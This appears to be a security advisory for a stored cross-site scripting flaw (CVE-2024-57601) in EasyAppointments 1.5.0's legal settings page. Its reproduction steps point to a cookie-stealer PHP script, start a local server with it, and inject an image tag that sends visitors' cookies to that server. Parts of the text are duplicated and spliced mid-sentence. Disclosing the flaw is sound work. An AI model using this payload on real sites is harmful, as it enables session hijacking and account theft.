EasyAppointments 1.5.0 | Authenticated Store XSS on Legal Settings Page
Basic Information
| Software Type | Web App |
|---|---|
| Software Name | EasyAppointments |
| Affected Version | 1.5.0 |
| Software Vendor | Alex Tselegidis |
| Software Link | https://github.com/alextselegidis/easyappointments |
| Severity | Medium |
| CVSS Score | 6.6 |
| CVE Link | https://www.cve.org/CVERecord?id=CVE-2024-57601 |
| Affected Assets | 3000+ |
| Date of Discovery | Dec 22nd, 2024 |
Description
The [
The problem is that the code you write here is executed whenever the page loads, most editors only run the code when it's displayed not when it's being modified but regardless this opens the website to XSS attacks.
/index.php/legal_settings] endpoint has three fields where you can insert custom policies such as cookie policy. The problem is that the code you write here is executed whenever the page loads, most editors only run the code when it's displayed not when it's being modified but regardless this opens the website to XSS attacks.
Reproduce
To setup a cookie stealer server, you can save the following PHP script as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Start a PHP server to serve it:
Login to the admin panel
Go to
Inside cookies field, click on embed code option of the text editor
Insert the following:
<img src="http://127.0.0.1:1718/capture.php">
This will capture cookies every time you visit legal settings page.
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Start a PHP server to serve it:
$ php -S 0.0.0.0:1718Login to the admin panel
Go to
/index.php/legal_settingsInside cookies field, click on embed code option of the text editor
Insert the following:
<img src="http://127.0.0.1:1718/capture.php">
This will capture cookies every time you visit legal settings page.
Proof of Concept (PoC) Video
PoC Exploit
N/A
Mitigation
Implement proper sanitization by whitelisting
Patch
Not available, the maintainer claims that the issue is well know and no fix will be issued at the moment.
Posted on: January 11, 2025 12:06 AM